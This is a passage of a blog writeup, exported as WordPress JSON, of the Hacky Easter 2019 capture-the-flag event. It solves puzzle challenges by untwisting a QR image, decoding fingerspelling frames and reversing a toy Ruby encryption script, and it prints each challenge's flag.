{"id":1528,"date":"2019-06-12T06:05:39","date_gmt":"2019-06-12T06:05:39","guid":{"rendered":"https:\/\/devel0pment.de\/?p=1528"},"modified":"2019-06-12T06:05:41","modified_gmt":"2019-06-12T06:05:41","slug":"hacky-easter-2019-writeup","status":"publish","type":"post","link":"https:\/\/devel0pment.de\/?p=1528","title":{"rendered":"Hacky Easter 2019 writeup"},"content":{"rendered":"\n<style>.spanFlag {color:#0000ff;font-weight:bold;}<\/style>\n<table>\n<tbody>\n<tr>\n<td width=\"75\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2018\/05\/logo.png\" width=\"64\"\/><\/td>\n<td>\nAs every year <a href=\"https:\/\/www.hacking-lab.com\/index.html\" rel=\"noopener noreferrer\" target=\"_blank\">hacking-lab.com<\/a> carried out the annual <b>Hacky Easter<\/b> event with 27 challenges. As usual the variety of the challenges was awesome. I actually got full score this year \ud83d\ude42 Many thanks to <a href=\"https:\/\/twitter.com\/daubsi\" target=\"_new\" rel=\"noopener noreferrer\">daubsi<\/a>, who gave me a nudge once in a while on the last challenges (you can find his writeup <a href=\"https:\/\/github.com\/OevreFlataeker\/hackyeaster19_writeup\" target=\"_new\" rel=\"noopener noreferrer\">here<\/a>).\n<\/tr>\n<\/tbody>\n<\/table>\n  <table style=\"display:table-cell;vertical-align:top;\">\n<tbody>\n<tr>\n<td width=\"75\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/flag_easy.png\" width=\"75\"\/><\/td>\n<td><span style=\"font-size:larger; font-weight:bold; color:#54AF79; text-shadow:1px 1px #000000;\">Easy<\/span><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\">\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg01\"><b>01<\/b> Twisted<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg02\"><b>02<\/b> Just Watch<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg03\"><b>03<\/b> Sloppy Encryption<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg04\"><b>04<\/b> Disco 2<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg05\"><b>05<\/b> Call for Papers<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg06\"><b>06<\/b> Dots<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg07\"><b>07<\/b> Shell we Argument<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg08\"><b>08<\/b> Modern Art<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg09\"><b>09<\/b> rorriM rorriM<\/a><br\/>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/flag_medium.png\" width=\"75\"\/><\/td>\n<td><span style=\"font-size:larger; font-weight:bold; color:#9CAF54; text-shadow:1px 1px #000000;\">Medium<\/span><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\">\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg10\"><b>10<\/b> Stackunderflow<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg11\"><b>11<\/b> Memeory 2.0<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg12\"><b>12<\/b> Decrypt0r<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg13\"><b>13<\/b> Symphony in HEX<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg14\"><b>14<\/b> White Box<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg15\"><b>15<\/b> Seen in Steem<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg16\"><b>16<\/b> Every-Thing<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg17\"><b>17<\/b> New Egg Design<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg18\"><b>18<\/b> Egg Storage<\/a><br\/>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/flag_hard.png\" width=\"75\"\/><\/td>\n<td><span style=\"font-size:larger; font-weight:bold; color:#AF5458; text-shadow:1px 1px #000000;\">Hard<\/span><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\">\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg19\"><b>19<\/b> CoUmpact DiAsc<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg20\"><b>20<\/b> Scrambled Egg<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg21\"><b>21<\/b> The Hunt: Misty Jungle<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg22\"><b>22<\/b> The Hunt: Muddy Quagmire<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg23\"><b>23<\/b> The Maze<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg24\"><b>24<\/b> CAPTEG<\/a><br\/>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"75\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/flag_hidden.png\" width=\"75\"\/><\/td>\n<td><span style=\"font-size:larger; font-weight:bold; color:#5481AF; text-shadow:1px 1px #000000;\">Hidden<\/span><\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\">\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg25\"><b>25<\/b> Hidden Egg #1<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg26\"><b>26<\/b> Hidden Egg #2<\/a><br\/>\n<a href=\"https:\/\/devel0pment.de\/?p=1528#chlg27\"><b>27<\/b> Hidden Egg #3<\/a><br\/>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<!--more-->\n<h1 id=\"chlg01\">01 &#8211; Twisted<\/h1>\nThe challenge directly provides the egg, though it is a little bit twisted:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg01_01.png\" \/>\n<br\/>\n<br\/>In order to untwist the image, GIMP can be used. At first I applied the filter <i>Filters -> Distorts -> Whirl and Pinch&#8230;<\/i> with a whirl value of <code>113.0<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg01_02.png\" width=\"600\"\/>\n<br\/>\n<br\/>Secondly the image can be rotated using the <i>Rotate Tool<\/i> (<code>Shift+R<\/code>) with an angle of approximately <code>-7.42<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg01_03.png\" width=\"600\"\/>\n<br\/>\n<br\/>The QR code of the final image can be scanned using <code>zbarimg<\/code> (<code>apt-get install zbar-tools<\/code>):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [2]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg01# zbarimg untwisted.png\nQR-Code:he19-Eihb-UUVw-nObm-lxaW\nscanned 1 barcode symbols from 1 images in 0.02 seconds\n<\/pre><\/div>\n<br\/>The flag is <span class=\"spanFlag\">he19-Eihb-UUVw-nObm-lxaW<\/span>.\n<br\/>\n<h1 id=\"chlg02\">02 &#8211; Just Watch<\/h1>\nThe challenge provides the following GIF animation:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg02_01.gif\" width=\"400\"\/>\n<br\/>\n<br\/>Obviously the girl on the picture is disclosing the password by showing different signs with her hand.\n<br\/>\n<br\/>Googling a little bit for <code>hand<\/code> and <code>signs<\/code> I found a wikipedia article about <a href=\"https:\/\/en.wikipedia.org\/wiki\/Fingerspelling\" target=\"_new\" rel=\"noopener noreferrer\">fingerspelling<\/a>.\n<br\/>\n<br\/>Using the google image search with the term <code>fingerspelling<\/code> revealed <a href=\"https:\/\/www.lifeprint.com\/asl101\/fingerspelling\/\" target=\"_new\" rel=\"noopener noreferrer\">this website<\/a> containing the following image:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg02_02.png\" width=\"400\"\/>\n<br\/>\n<br\/>This seem to be the exact same images as used in the challenge.\n<br\/>\n<br\/>In order to decode the password more easily, I started by extracting all frames of the animation using <code>convert<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [1]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg02# convert -coalesce justWatch.gif out%d.png\nroot@kali:~\/Documents\/he19\/egg02# ls -al\ntotal 3716\ndrwxr-xr-x 2 root root    4096 May 15 02:38 .\ndrwxr-xr-x 3 root root    4096 May 15 02:11 ..\n-rw-r--r-- 1 root root 1948510 May 15 02:11 justWatch.gif\n-rw-r--r-- 1 root root  166684 May 15 02:38 out0.png\n-rw-r--r-- 1 root root  166761 May 15 02:38 out10.png\n-rw-r--r-- 1 root root  167056 May 15 02:38 out1.png\n-rw-r--r-- 1 root root  166346 May 15 02:38 out2.png\n-rw-r--r-- 1 root root  166343 May 15 02:38 out3.png\n-rw-r--r-- 1 root root  165351 May 15 02:38 out4.png\n-rw-r--r-- 1 root root  166343 May 15 02:38 out5.png\n-rw-r--r-- 1 root root  165907 May 15 02:38 out6.png\n-rw-r--r-- 1 root root  166516 May 15 02:38 out7.png\n-rw-r--r-- 1 root root  167056 May 15 02:38 out8.png\n-rw-r--r-- 1 root root  166632 May 15 02:38 out9.png\n<\/pre><\/div>\n<br\/>Now each frame of the animation can be mapped to the corresponding letter from the above image:\n<br\/>\n<br\/><table><tbody><tr><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out0.png\" \/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out1.png\" \/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out2.png\" \/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out3.png\" \/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out4.png\" \/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out5.png\" \/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out6.png\" \/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out7.png\" \/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out8.png\" \/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out9.png\" \/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/egg02\/out10.png\" \/><\/td><\/tr><tr style=\"font-size:24px;text-align:center;\"><td>g<\/td><td>i<\/td><td>v<\/td><td>e<\/td><td>m<\/td><td>e<\/td><td>a<\/td><td>s<\/td><td>i<\/td><td>g<\/td><td>n<\/td><\/tr><\/tbody><\/table>\n<br\/>\n<br\/>Entering the password <code>givemeasign<\/code> in the Eggo-o-Matic&trade; yields the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg02_03.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-DwWd-aUU2-yVhE-SbaG<\/span>.\n<br\/>\n<h1 id=\"chlg03\">03 &#8211; Sloppy Encryption<\/h1>\nThe challenge provides the following ruby script called <code>sloppy.rb<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: ruby; title: ; notranslate\" title=\"\">\nrequire&quot;base64&quot;\nputs&quot;write some text and hit enter:&quot;\ninput=gets.chomp\nh=input.unpack(&#039;C&#039;*input.length).collect{|x|x.to_s(16)}.join\nox=&#039;%#X&#039;%h.to_i(16)\nx=ox.to_i(16)*&#x5B;&#039;5&#039;].cycle(101).to_a.join.to_i\nc=x.to_s(16).scan(\/..\/).map(&amp;:hex).map(&amp;:chr).join\nb=Base64.encode64(c)\nputs&quot;encrypted text:&quot;&quot;#{b}&quot;\n<\/pre><\/div>\n<br\/>The script prompts the user to enter some text, which is encrypted (in this case <code>\"test\"<\/code>):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [3,4,5]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg03# ruby sloppy.rb\nwrite some text and hit enter:\ntest\nencrypted text:LjG7n80dns+hkaaYQKo0CqOOvhyCrBHyBmmHDxNDMfoSDjjjjjjjjjjjTY6\/\n3A==\n<\/pre><\/div>\n<br\/>The challenge description also provides an already encrypted string which should be decrypted:\n<br\/>\n<br\/><code>K7sAYzGlYx0kZyXIIPrXxK22DkU4Q+rTGfUk9i9vA60C\/ZcQOSWNfJLTu4RpIBy\/27yK5CBW+UrBhm0=<\/code>\n<br\/>\n<br\/>In order to decrypt the string, we need to revert the steps made by the script. Let&#8217;s start by determining what each of the steps does.\n<br\/>\n<br\/>At first the user input is read using <code>gets.chomp<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: ruby; first-line: 3; title: ; notranslate\" title=\"\">\ninput=gets.chomp\n<\/pre><\/div>\n<br\/>Then several methods are called on this input and the final result is stored in the variable <code>h<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: ruby; first-line: 4; title: ; notranslate\" title=\"\">\nh=input.unpack(&#039;C&#039;*input.length).collect{|x|x.to_s(16)}.join\n<\/pre><\/div>\n<br\/>In order to understand what these methods do, we can call them one after another on some test input using the interactive ruby shell (<i>irb<\/i>):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [1,3,5,7,9]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg03# irb --simple-prompt\n&gt;&gt; input = &#039;test&#039;\n=&gt; &quot;test&quot;\n&gt;&gt; input.unpack(&#039;C&#039;*input.length)\n=&gt; &#x5B;116, 101, 115, 116]\n&gt;&gt; input.unpack(&#039;C&#039;*input.length).collect{|x|x.to_s(16)}\n=&gt; &#x5B;&quot;74&quot;, &quot;65&quot;, &quot;73&quot;, &quot;74&quot;]\n&gt;&gt; h=input.unpack(&#039;C&#039;*input.length).collect{|x|x.to_s(16)}.join\n=&gt; &quot;74657374&quot;\n<\/pre><\/div>\n<br\/>As we can see, each character of the input string is converted to its corresponding ASCII value (<code>unpack<\/code>), which is then converted to its hex value as a string (<code>to_s(16)<\/code>). Finally all single hex strings are combined to one string (<code>join<\/code>).\n<br\/>\n<br\/>The next line basically prepends <code>\"0X\"<\/code> to the string:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [2]; title: ; notranslate\" title=\"\">\n&gt;&gt; ox=&#039;%#X&#039;%h.to_i(16)\n=&gt; &quot;0X74657374&quot;\n\n<\/pre><\/div>\n<br\/>The resulting value is multiplied with another value:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: ruby; first-line: 6; title: ; notranslate\" title=\"\">\nx=ox.to_i(16)*&#x5B;&#039;5&#039;].cycle(101).to_a.join.to_i\n<\/pre><\/div>\n<br\/>Let&#8217;s comprehend the value of both multipliers:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [2,4]; title: ; notranslate\" title=\"\">\n&gt;&gt; ox.to_i(16)\n=&gt; 1952805748\n&gt;&gt; &#x5B;&#039;5&#039;].cycle(101).to_a.join.to_i\n=&gt; 55555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555\n<\/pre><\/div>\n<br\/>The first multiplier is the value of the hex string converted to an integer (<code>\"0X74657374\" = 1952805748<\/code>). The second multiplier is simply the value <code>555...<\/code> (101 times).\n<br\/>\n<br\/>The next lines contains a few method calls on the resulting value <code>x<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: ruby; first-line: 7; title: ; notranslate\" title=\"\">\nc=x.to_s(16).scan(\/..\/).map(&amp;:hex).map(&amp;:chr).join\n<\/pre><\/div>\n<br\/>Again, let&#8217;s call the methods one after another in order to understand what they do:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [2,4,6,8,10]; title: ; notranslate\" title=\"\">\n&gt;&gt; x.to_s(16)\n=&gt; &quot;2e31bb9fcd1d9ecfa191a69840aa340aa38ebe1c82ac11f20669870f134331fa120e38e38e38e38e38e34d8ebfdc&quot;\n&gt;&gt; x.to_s(16).scan(\/..\/)\n=&gt; &#x5B;&quot;2e&quot;, &quot;31&quot;, &quot;bb&quot;, &quot;9f&quot;, &quot;cd&quot;, &quot;1d&quot;, &quot;9e&quot;, &quot;cf&quot;, &quot;a1&quot;, &quot;91&quot;, &quot;a6&quot;, &quot;98&quot;, &quot;40&quot;, &quot;aa&quot;, &quot;34&quot;, &quot;0a&quot;, &quot;a3&quot;, &quot;8e&quot;, &quot;be&quot;, &quot;1c&quot;, &quot;82&quot;, &quot;ac&quot;, &quot;11&quot;, &quot;f2&quot;, &quot;06&quot;, &quot;69&quot;, &quot;87&quot;, &quot;0f&quot;, &quot;13&quot;, &quot;43&quot;, &quot;31&quot;, &quot;fa&quot;, &quot;12&quot;, &quot;0e&quot;, &quot;38&quot;, &quot;e3&quot;, &quot;8e&quot;, &quot;38&quot;, &quot;e3&quot;, &quot;8e&quot;, &quot;38&quot;, &quot;e3&quot;, &quot;4d&quot;, &quot;8e&quot;, &quot;bf&quot;, &quot;dc&quot;]\n&gt;&gt; x.to_s(16).scan(\/..\/).map(&amp;:hex)\n=&gt; &#x5B;46, 49, 187, 159, 205, 29, 158, 207, 161, 145, 166, 152, 64, 170, 52, 10, 163, 142, 190, 28, 130, 172, 17, 242, 6, 105, 135, 15, 19, 67, 49, 250, 18, 14, 56, 227, 142, 56, 227, 142, 56, 227, 77, 142, 191, 220]\n&gt;&gt; x.to_s(16).scan(\/..\/).map(&amp;:hex).map(&amp;:chr)\n=&gt; &#x5B;&quot;.&quot;, &quot;1&quot;, &quot;\\xBB&quot;, &quot;\\x9F&quot;, &quot;\\xCD&quot;, &quot;\\x1D&quot;, &quot;\\x9E&quot;, &quot;\\xCF&quot;, &quot;\\xA1&quot;, &quot;\\x91&quot;, &quot;\\xA6&quot;, &quot;\\x98&quot;, &quot;@&quot;, &quot;\\xAA&quot;, &quot;4&quot;, &quot;\\n&quot;, &quot;\\xA3&quot;, &quot;\\x8E&quot;, &quot;\\xBE&quot;, &quot;\\x1C&quot;, &quot;\\x82&quot;, &quot;\\xAC&quot;, &quot;\\x11&quot;, &quot;\\xF2&quot;, &quot;\\x06&quot;, &quot;i&quot;, &quot;\\x87&quot;, &quot;\\x0F&quot;, &quot;\\x13&quot;, &quot;C&quot;, &quot;1&quot;, &quot;\\xFA&quot;, &quot;\\x12&quot;, &quot;\\x0E&quot;, &quot;8&quot;, &quot;\\xE3&quot;, &quot;\\x8E&quot;, &quot;8&quot;, &quot;\\xE3&quot;, &quot;\\x8E&quot;, &quot;8&quot;, &quot;\\xE3&quot;, &quot;M&quot;, &quot;\\x8E&quot;, &quot;\\xBF&quot;, &quot;\\xDC&quot;]\n&gt;&gt; x.to_s(16).scan(\/..\/).map(&amp;:hex).map(&amp;:chr).join\n=&gt; &quot;.1\\xBB\\x9F\\xCD\\x1D\\x9E\\xCF\\xA1\\x91\\xA6\\x98@\\xAA4\\n\\xA3\\x8E\\xBE\\x1C\\x82\\xAC\\x11\\xF2\\x06i\\x87\\x0F\\x13C1\\xFA\\x12\\x0E8\\xE3\\x8E8\\xE3\\x8E8\\xE3M\\x8E\\xBF\\xDC&quot;\n<\/pre><\/div>\n<br\/>At first the value of <code>x<\/code> is converted to a hex string (<code>to_s(16)<\/code>), which is then split into an array containing two hex values in each element (<code>scan<\/code>). Each element&#8217;s value is converted to an integer (<code>map(&:hex)<\/code>), which is then converted to an ASCII character (<code>map(&:char)<\/code>). Finally all ASCII characters are combined to one string (<code>join<\/code>).\n<br\/>\n<br\/>At the very last this string is base64 encoded an printed as the encrypted text:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: ruby; first-line: 8; title: ; notranslate\" title=\"\">\nb=Base64.encode64(c)\nputs&quot;encrypted text:&quot;&quot;#{b}&quot;\n<\/pre><\/div>\n<br\/>With our test input:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [2]; title: ; notranslate\" title=\"\">\n&gt;&gt; b=Base64.encode64(c)\n=&gt; &quot;LjG7n80dns+hkaaYQKo0CqOOvhyCrBHyBmmHDxNDMfoSDjjjjjjjjjjjTY6\/\\n3A==\\n&quot;\n<\/pre><\/div>\n<br\/>As we now understand, what the script does, we can revert the process in order to decrypt the given string (I added intermediate steps and removed unnecessary steps for better understanding):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [2,4,6,8,10,12,14,16,18]; title: ; notranslate\" title=\"\">\n&gt;&gt; c=Base64.decode64(b)\n=&gt; &quot;.1\\xBB\\x9F\\xCD\\x1D\\x9E\\xCF\\xA1\\x91\\xA6\\x98@\\xAA4\\n\\xA3\\x8E\\xBE\\x1C\\x82\\xAC\\x11\\xF2\\x06i\\x87\\x0F\\x13C1\\xFA\\x12\\x0E8\\xE3\\x8E8\\xE3\\x8E8\\xE3M\\x8E\\xBF\\xDC&quot;\n&gt;&gt; c.split(&#039;&#039;)\n=&gt; &#x5B;&quot;.&quot;, &quot;1&quot;, &quot;\\xBB&quot;, &quot;\\x9F&quot;, &quot;\\xCD&quot;, &quot;\\x1D&quot;, &quot;\\x9E&quot;, &quot;\\xCF&quot;, &quot;\\xA1&quot;, &quot;\\x91&quot;, &quot;\\xA6&quot;, &quot;\\x98&quot;, &quot;@&quot;, &quot;\\xAA&quot;, &quot;4&quot;, &quot;\\n&quot;, &quot;\\xA3&quot;, &quot;\\x8E&quot;, &quot;\\xBE&quot;, &quot;\\x1C&quot;, &quot;\\x82&quot;, &quot;\\xAC&quot;, &quot;\\x11&quot;, &quot;\\xF2&quot;, &quot;\\x06&quot;, &quot;i&quot;, &quot;\\x87&quot;, &quot;\\x0F&quot;, &quot;\\x13&quot;, &quot;C&quot;, &quot;1&quot;, &quot;\\xFA&quot;, &quot;\\x12&quot;, &quot;\\x0E&quot;, &quot;8&quot;, &quot;\\xE3&quot;, &quot;\\x8E&quot;, &quot;8&quot;, &quot;\\xE3&quot;, &quot;\\x8E&quot;, &quot;8&quot;, &quot;\\xE3&quot;, &quot;M&quot;, &quot;\\x8E&quot;, &quot;\\xBF&quot;, &quot;\\xDC&quot;]\n&gt;&gt; c.split(&#039;&#039;).map(&amp;:ord)\n=&gt; &#x5B;46, 49, 187, 159, 205, 29, 158, 207, 161, 145, 166, 152, 64, 170, 52, 10, 163, 142, 190, 28, 130, 172, 17, 242, 6, 105, 135, 15, 19, 67, 49, 250, 18, 14, 56, 227, 142, 56, 227, 142, 56, 227, 77, 142, 191, 220]\n&gt;&gt; c.split(&#039;&#039;).map(&amp;:ord).map{|x|&#039;%02x&#039;%x}\n=&gt; &#x5B;&quot;2e&quot;, &quot;31&quot;, &quot;bb&quot;, &quot;9f&quot;, &quot;cd&quot;, &quot;1d&quot;, &quot;9e&quot;, &quot;cf&quot;, &quot;a1&quot;, &quot;91&quot;, &quot;a6&quot;, &quot;98&quot;, &quot;40&quot;, &quot;aa&quot;, &quot;34&quot;, &quot;0a&quot;, &quot;a3&quot;, &quot;8e&quot;, &quot;be&quot;, &quot;1c&quot;, &quot;82&quot;, &quot;ac&quot;, &quot;11&quot;, &quot;f2&quot;, &quot;06&quot;, &quot;69&quot;, &quot;87&quot;, &quot;0f&quot;, &quot;13&quot;, &quot;43&quot;, &quot;31&quot;, &quot;fa&quot;, &quot;12&quot;, &quot;0e&quot;, &quot;38&quot;, &quot;e3&quot;, &quot;8e&quot;, &quot;38&quot;, &quot;e3&quot;, &quot;8e&quot;, &quot;38&quot;, &quot;e3&quot;, &quot;4d&quot;, &quot;8e&quot;, &quot;bf&quot;, &quot;dc&quot;]\n&gt;&gt; c.split(&#039;&#039;).map(&amp;:ord).map{|x|&#039;%02x&#039;%x}.join\n=&gt; &quot;2e31bb9fcd1d9ecfa191a69840aa340aa38ebe1c82ac11f20669870f134331fa120e38e38e38e38e38e34d8ebfdc&quot;\n&gt;&gt; x=c.split(&#039;&#039;).map(&amp;:ord).map{|x|&#039;%02x&#039;%x}.join.to_i(16)\n=&gt; 108489208222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222221137330140\n&gt;&gt; ox=x\/&#x5B;&#039;5&#039;].cycle(101).to_a.join.to_i\n=&gt; 1952805748\n&gt;&gt; h=ox.to_s(16)\n=&gt; &quot;74657374&quot;\n&gt;&gt; input=&#x5B;h].pack(&#039;H*&#039;)\n=&gt; &quot;test&quot;\n<\/pre><\/div>\n<br\/>The final decrypt script &#8230;\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: ruby; title: ; notranslate\" title=\"\">\nrequire&quot;base64&quot;\nputs&quot;write string to be decrypted and hit enter:&quot;\nb=gets.chomp\nc=Base64.decode64(b)\nx=c.split(&#039;&#039;).map(&amp;:ord).map{|x|&#039;%02x&#039;%x}.join.to_i(16)\nox=x\/&#x5B;&#039;5&#039;].cycle(101).to_a.join.to_i\nh=ox.to_s(16)\ninput=&#x5B;h].pack(&#039;H*&#039;)\nputs&quot;decrypted text:&quot;&quot;#{input}&quot;\n<\/pre><\/div>\n<br\/>&#8230; can be used the decrypt the given string:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [1,3,4]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg03# ruby decrypt.rb\nwrite string to be decrypted and hit enter:\nK7sAYzGlYx0kZyXIIPrXxK22DkU4Q+rTGfUk9i9vA60C\/ZcQOSWNfJLTu4RpIBy\/27yK5CBW+UrBhm0=\ndecrypted text:n00b_style_crypto\n<\/pre><\/div>\n<br\/>Entering the decrypted text <code>n00b_style_crypto<\/code> as the password in the Eggo-o-Matic&trade; yields the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg03_01.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-YPkZ-ZZpf-nbYt-6ZyD<\/span>.\n<br\/>\n<h1 id=\"chlg04\">04 &#8211; Disco 2<\/h1>\nThe challenge description contains a link to the following website, which displays a mirror ball in center of a bridge:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg04_01.png\" width=\"700\"\/>\n<br\/>\n<br\/>A comment within the source code states, that the implementation is taken from <code>http:\/\/threejs.org<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: xml; first-line: 38; title: ; notranslate\" title=\"\">\n&lt;!-- From http:\/\/threejs.org webgl environment examples  --&gt;\n&lt;!-- Spherical Map by Paul Debevec (http:\/\/www.pauldebevec.com\/Probes\/)  --&gt;\n<\/pre><\/div>\n<br\/>Actually the original example can be found <a href=\"https:\/\/threejs.org\/examples\/#webgl_materials_envmaps\" target=\"_new\" rel=\"noopener noreferrer\">here<\/a>. The source code is also available on <a href=\"https:\/\/github.com\/mrdoob\/three.js\/blob\/master\/examples\/webgl_materials_envmaps.html\" target=\"_new\" rel=\"noopener noreferrer\">GitHub<\/a>.\n<br\/>\n<br\/>Instead of a mirror ball the original version displays an ordinary sphere:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg04_02.png\" width=\"700\"\/>\n<br\/>\n<br\/>There are basically three js-files included in the original version:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: xml; first-line: 27; title: ; notranslate\" title=\"\">\n\t\t&lt;script src=&quot;..\/build\/three.js&quot;&gt;&lt;\/script&gt;\n\n\t\t&lt;script src=&quot;js\/controls\/OrbitControls.js&quot;&gt;&lt;\/script&gt;\n\n\t\t&lt;script src=&quot;js\/libs\/dat.gui.min.js&quot;&gt;&lt;\/script&gt;\n<\/pre><\/div>\n<br\/>The challenge version contains an additional file called <code>mirrors.js<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: xml; first-line: 33; highlight: [36]; title: ; notranslate\" title=\"\">\n  &lt;script src=&quot;js\/three.js&quot;&gt;&lt;\/script&gt;\n  &lt;script 